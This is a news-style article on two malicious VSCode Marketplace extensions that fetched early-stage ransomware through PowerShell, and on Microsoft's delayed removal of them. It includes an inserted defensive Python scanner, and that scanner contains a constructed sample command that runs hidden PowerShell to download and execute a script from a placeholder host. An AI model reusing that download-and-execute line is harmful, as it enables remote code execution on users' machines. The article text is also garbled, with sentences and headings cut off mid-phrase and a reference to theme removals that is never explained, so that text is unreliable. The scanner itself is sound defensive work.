Malicious VSCode Extensions Expose Critical Security Gaps in Microsoft’s Marketplace


The Growing Concern Over VSCode Marketplace Security

Two malicious extensions on the VSCode Marketplace, “ahban.shiba” and “ahban.cychelloworld,” have exposed major flaws in Microsoft’s review and security processes. These extensions, designed for Visual Studio Code, were found to contain in-development ransomware, raising concerns about the platform’s ability to detect and remove malicious software in a timely manner.

Though downloaded only seven and eight times, respectively, before being removed, their presence for months on the official store is alarming. Security firm ReversingLabs uncovered that these extensions ran PowerShell commands to download and execute ransomware scripts from a remote server.

The ransomware itself appeared to be in the early stages of development, as it only encrypted files in a test folder (C:\users\%username%\Desktop\testShiba). Once files were encrypted, a simple pop-up message demanded a ransom of 1 ShibaCoin but provided no further instructions, suggesting it was still a work in progress rather than a fully operational attack.

Microsoft swiftly removed the extensions after receiving reports from ReversingLabs. However, security researcher Itay Kruk from ExtensionTotal revealed that their automated scanner had detected the extensions much earlier. Microsoft was informed but took no immediate action.

Even more concerning, ahban.cychelloworld was initially benign when first uploaded on October 27, 2024, but introduced ransomware code in version 0.0.2, which was approved by Microsoft on November 24, 2024. Despite multiple updates containing malicious code, Microsoft continued to approve the extension until it was finally removed in February 2025.

This case highlights glaring weaknesses in

What Undercode Says: A Deeper Look into the Security Implications

This incident is a wake-up call for Microsoft and the entire developer community. The ability of attackers to slip malicious code into approved extensions and remain undetected for months highlights serious weaknesses in Microsoft’s security review system.

1. The Risks of Trusting Official Marketplaces

Developers and users often assume that software from official marketplaces is safe. However, as this case proves, malicious actors are actively exploiting gaps in security reviews. The presence of ransomware in a developer tool like VSCode means that even well-trusted ecosystems can become attack vectors.

2. The Evolution of Malware in Extensions

The fact that ahban.cychelloworld was initially safe but later turned malicious is particularly concerning. This means attackers can submit harmless extensions to gain trust and approvals before injecting malware in later updates. Microsoft’s failure to detect and respond quickly suggests that security measures are not proactive enough to monitor evolving threats.

3. PowerShell Exploits and Remote Execution Risks

The ransomware within these extensions executed PowerShell scripts from a remote server, a common tactic in modern cyberattacks. This highlights a broader problem: PowerShell remains a powerful attack tool that, if not properly monitored, can be used to bypass traditional security defenses. Developers should be cautious when installing extensions that have script execution capabilities.

4.

Despite being warned in November 2024, Microsoft did not act for months, allowing multiple updates of ahban.cychelloworld to introduce and retain ransomware. This raises an important question: Why did an automated scanner catch the threat before Microsoft’s security team did?

5. Inconsistencies in

Microsoft’s overreaction in removing popular VSCode themes—while failing to act on actual malware—suggests an inconsistent approach to security enforcement. Their decision-making process needs to be more transparent and based on clear, verified threats rather than assumptions.

6. The Future of VSCode Marketplace Security

To prevent similar incidents, Microsoft must:

  • Strengthen automated and manual review processes to catch malicious updates faster.
  • Implement stricter monitoring of extensions that execute remote scripts.
  • Increase transparency in how security decisions are made, ensuring developers understand why extensions are removed or approved.
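The two points above, that extensions with script execution capabilities deserve caution (section 3) and that extensions executing remote scripts should be monitored more strictly (section 6), can be turned into a local audit. The script below is an added example, not code from the article, from ReversingLabs, ExtensionTotal or Microsoft. It assumes the standard VS Code layout of one directory per installed extension under `~/.vscode/extensions/`, each with a `package.json` manifest and JavaScript sources, and it uses an illustrative pattern list (PowerShell launches, download cmdlets, `iex`, hidden-window and bypass flags, `child_process`). The two sample extensions it scans when no real extension directory exists are constructed stand-ins, not the real `ahban.*` code.

```python
"""Audit installed VS Code extensions for remote-script-execution heuristics.

Added defensive example. A hit means "read this code", not proof of malice:
legitimate extensions also spawn processes (formatters, language servers).
"""
import json
import re
import tempfile
from pathlib import Path

# Heuristic categories. The combination download + execution is the pattern
# ReversingLabs described for ahban.shiba / ahban.cychelloworld.
PATTERNS = {
    "powershell_launch": re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh\b", re.I),
    "remote_download":   re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Invoke-RestMethod", re.I),
    "dynamic_exec":      re.compile(r"Invoke-Expression|\biex\b|\beval\(", re.I),
    "evasion_flags":     re.compile(r"-WindowStyle\s+Hidden|-ExecutionPolicy\s+Bypass|-NoProfile", re.I),
    "spawns_process":    re.compile(r"child_process|spawnSync|execSync|\.exec\(|\.spawn\("),
}


def scan_source(text: str) -> dict[str, int]:
    """Count hits per heuristic category in one source file; empty dict when clean."""
    return {name: len(rx.findall(text)) for name, rx in PATTERNS.items() if rx.search(text)}


def activates_on_startup(manifest: dict) -> bool:
    """'*' and 'onStartupFinished' make the extension run with no user action at all."""
    return any(e in ("*", "onStartupFinished") for e in manifest.get("activationEvents", []))


def risk_level(hits: dict[str, int], startup: bool) -> str:
    """Rough triage: process launch plus a download primitive is the high-risk shape."""
    if ("powershell_launch" in hits or "spawns_process" in hits) and "remote_download" in hits:
        return "high"
    if hits:
        return "medium" if startup else "low"
    return "none"


def scan_extension(ext_dir: Path) -> dict:
    """Scan one extension directory: its manifest plus every .js file outside node_modules."""
    manifest = {}
    pkg = ext_dir / "package.json"
    if pkg.is_file():
        manifest = json.loads(pkg.read_text(encoding="utf-8", errors="replace"))
    hits: dict[str, int] = {}
    for js in ext_dir.rglob("*.js"):
        if "node_modules" in js.parts:
            continue  # vendored libraries are noisy; audit them separately
        for name, n in scan_source(js.read_text(encoding="utf-8", errors="replace")).items():
            hits[name] = hits.get(name, 0) + n
    startup = activates_on_startup(manifest)
    return {
        "id": f"{manifest.get('publisher', '?')}.{manifest.get('name', ext_dir.name)}",
        "version": manifest.get("version", "?"),
        "startup_activation": startup,
        "hits": hits,
        "risk": risk_level(hits, startup),
    }


def scan_all(extensions_root: Path) -> list[dict]:
    """Scan every extension directory under the given root, in a stable order."""
    return [scan_extension(d) for d in sorted(extensions_root.iterdir()) if d.is_dir()]


# Constructed samples (not the real extensions' code) so the script runs offline.
BENIGN_JS = """
const vscode = require('vscode');
function activate(ctx) {
  ctx.subscriptions.push(vscode.commands.registerCommand('hello', () =>
    vscode.window.showInformationMessage('hi')));
}
module.exports = { activate };
"""

SUSPICIOUS_JS = r"""
const { exec } = require('child_process');
function activate() {
  // constructed stand-in for the download-and-run behaviour the article describes
  exec(`powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "iex ((New-Object Net.WebClient).DownloadString('https://placeholder.invalid/stage.ps1'))"`);
}
module.exports = { activate };
"""


def demo() -> list[dict]:
    """Build a throwaway extensions root with one benign and one suspicious extension, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for dirname, js, events in (
            ("example.hello-0.0.1", BENIGN_JS, ["onCommand:hello"]),
            ("example.helper-0.0.2", SUSPICIOUS_JS, ["*"]),
        ):
            publisher, rest = dirname.split(".", 1)
            name, version = rest.rsplit("-", 1)
            d = root / dirname
            d.mkdir()
            (d / "package.json").write_text(json.dumps({
                "publisher": publisher, "name": name, "version": version,
                "activationEvents": events, "main": "./extension.js"}))
            (d / "extension.js").write_text(js)
        return scan_all(root)


if __name__ == "__main__":
    real_root = Path.home() / ".vscode" / "extensions"
    for r in (scan_all(real_root) if real_root.is_dir() else demo()):
        print(f"{r['risk']:<6} {r['id']} {r['version']} startup={r['startup_activation']} hits={r['hits']}")
```

Run it after every extension update, not only at install time: the article's point is that `ahban.cychelloworld` was clean at version 0.0.1 and only gained the download-and-execute code in 0.0.2, so a one-time check at first install would have passed it. Treat "high" results as a prompt to read the flagged file and to compare the new version's sources against the previous one before trusting the update.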

Fact Checker Results

  • Microsoft failed to act on a reported malicious extension for months, despite early warnings from third-party security researchers.
  • Malicious code was added in an update, showing that extensions can evolve into threats even after initial approval.
  • Microsoft has inconsistently handled security enforcement, sometimes acting too late, and other times acting too aggressively without full verification.

References:

Reported By: https://www.bleepingcomputer.com/news/security/vscode-extensions-found-downloading-early-stage-ransomware/